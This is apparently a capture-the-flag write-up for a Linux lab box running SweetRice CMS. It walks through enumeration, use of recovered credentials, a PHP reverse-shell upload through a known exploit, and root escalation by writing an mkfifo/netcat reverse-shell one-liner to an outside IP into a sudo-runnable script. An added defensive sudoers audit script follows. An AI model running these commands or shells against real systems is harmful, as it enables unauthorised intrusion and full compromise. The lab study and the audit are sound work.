
[Linux] Lazy Admin
Reconnaissance
sudo nmap 10.10.230.22
sudo nmap -A -p 22,80 10.10.230.22


Enumeration
HTTP
gobuster dir -u http://10.10.230.22/ -w /usr/share/wordlists/dirb/common.txt


gobuster dir -u http://10.10.230.22/content -w /usr/share/wordlists/dirb/common.txt

On the webpage at /inc, there is a database containing some credentials.


CrackStation lets us recover the plaintext password from the stored hash.

This password lets us log in to the password-protected page at /as. Credentials: manager / Password123.


Vulnerability research
The website was built with the SweetRice CMS, so we can look for known vulnerabilities in that CMS.
searchsploit SweetRice

Exploitation
We used the exploit 40700.html to gain remote code execution (RCE).
searchsploit -m php/webapps/40700.html
Following the exploit's instructions, we upload a PHP reverse shell through http://10.10.230.22/content/as/?type=ad.
cp /usr/share/webshells/php/php-reverse-shell.php .
nano php-reverse-shell.php   # point the shell at our listener's IP and port 1234


nc -nlvp 1234

We then upgrade to a stable shell and collect the user flag.

Privilege escalation
sudo -l

We have permission to modify /etc/copy.sh, which establishes a reverse shell to a hard-coded IP address. We set it to our own local IP address to receive the reverse shell.
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.167.85 4321 >/tmp/f" > /etc/copy.sh
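As an added example (not code from the original writeup), here is the audit check an administrator could run on the box to catch exactly this condition before anyone abuses it: it walks a sudoers file, lists every absolute path in a command spec, and flags the ones that a user other than the owner can rewrite, which is what makes /etc/copy.sh root-equivalent here. The sudoers lines, the user name labuser and the temp-dir paths are constructed for the demonstration; it assumes a GNU/Linux userland (ls, cut, tr, mktemp) and the one-line sudoers form printed by sudo -l.

```shell
#!/bin/sh
# Added audit check; this is not code from the original writeup.
# It finds the condition the Privilege escalation section abuses: a file that
# sudo lets a user run as root but that someone other than its owner can edit.
# Assumptions, all constructed for this example: a GNU/Linux userland
# (ls, cut, tr, mktemp), sudoers entries in the one-line form
# "user HOST=(RUNAS) [NOPASSWD:] cmd [, cmd ...]", and the lab names in setup_lab.

# is_loosely_writable PATH
# Exit 0 when the group- or other-write bit is set, i.e. a user who is not
# the owner could rewrite the file. Symlinks are followed (-L) because sudo
# executes the target, not the link. Columns 6 and 9 of `ls -l` are those bits.
is_loosely_writable() {
    bits=$(ls -ldL -- "$1" | cut -c6,9)
    [ "$bits" != "--" ]
}

# audit_sudoers_file SUDOERS_FILE
# Prints one line per absolute path mentioned in a command spec:
#   WRITABLE <user> <path>   a non-owner can edit it: treat as root-equivalent
#   OK       <user> <path>   only the owner can write it
#   MISSING  <user> <path>   referenced but absent (harmless, but review it)
audit_sudoers_file() {
    file=$1
    while IFS= read -r line; do
        # skip comments, blank lines, Defaults and alias definitions
        case "$line" in
            ''|'#'*|Defaults*|*_Alias*) continue ;;
        esac
        set -- $line                      # word-split the spec; $1 is the user
        user=$1
        # everything after the last ':' drops "(ALL) NOPASSWD:"; if the line
        # carries no tag, fall back to everything after the '='
        spec=${line##*:}
        if [ "$spec" = "$line" ]; then
            spec=${line#*=}
        fi
        spec=$(printf '%s' "$spec" | tr ',' ' ')
        for tok in $spec; do
            case "$tok" in /*) ;; *) continue ;; esac
            if [ ! -e "$tok" ]; then
                printf 'MISSING %s %s\n' "$user" "$tok"
            elif is_loosely_writable "$tok"; then
                printf 'WRITABLE %s %s\n' "$user" "$tok"
            else
                printf 'OK %s %s\n' "$user" "$tok"
            fi
        done
    done < "$file"
}

# setup_lab
# Builds a constructed sudoers snippet and two target scripts in a temp dir
# and prints the dir. copy.sh is world-writable (the writeup's bug);
# backup.sh is owner-writable only.
setup_lab() {
    dir=$(mktemp -d)
    printf '#!/bin/sh\necho backup\n' > "$dir/copy.sh"
    printf '#!/bin/sh\necho backup\n' > "$dir/backup.sh"
    chmod 666 "$dir/copy.sh"
    chmod 644 "$dir/backup.sh"
    cat > "$dir/sudoers" <<EOF
# constructed sample modelled on the writeup's sudo -l output
Defaults env_reset
labuser ALL=(ALL) NOPASSWD: /bin/sh $dir/copy.sh
labuser ALL=(ALL) NOPASSWD: $dir/backup.sh
EOF
    printf '%s\n' "$dir"
}

# stand-alone run: build the lab, audit it, clean up
lab=$(setup_lab)
audit_sudoers_file "$lab/sudoers"
rm -rf "$lab"
```

Run against a real host with `audit_sudoers_file /etc/sudoers` (and each file under /etc/sudoers.d); any WRITABLE line is a finding to fix with `chown root:root` and `chmod 755`, since whoever can edit that file effectively has the sudo rule's privileges.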

Persistence
We can change the password of the user itguy or create a new user on the machine.
Remediation